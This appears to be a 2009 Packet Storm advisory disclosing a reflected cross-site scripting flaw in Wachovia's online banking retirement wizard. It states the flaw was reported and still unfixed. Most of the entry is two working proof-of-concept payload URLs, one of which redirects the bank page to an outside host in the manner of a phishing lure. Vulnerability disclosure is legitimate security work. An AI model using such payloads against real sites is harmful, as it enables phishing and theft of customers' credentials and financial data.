Wachovia Bank Cross Site Scripting

2009-09-01T00:00:00
ID PACKETSTORM:80853
Type packetstorm
Reporter Marshall Whittaker
Modified 2009-09-01T00:00:00

Description

                                        
                                            `I found this a week ago and notified the CISO, and it still has not been  
fixed. It's a pretty simple cross site scripting vulnerabilty in the bank's  
retirement wizard page, it could allow theft of usernames, passwords, pins,  
SSN's, account numbers, etc.  
  
  
---- Code  
  
Wachovia Online Banking Retirement Wizard - XSS - PoC  
This is only a proof of concept, please use this responsibly, don't phish,  
you'll get caught anyway.  
This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 29  
2009.  
  
Very simple standard cross site scripting exploit. As you can see, it works  
with HEX as well. Bad characters obviously arn't filtered correctly.  
  
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=  
><script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>  
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script  
%0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html  
";%3B</script>  
  
--oxagast  
  
---- Code  
`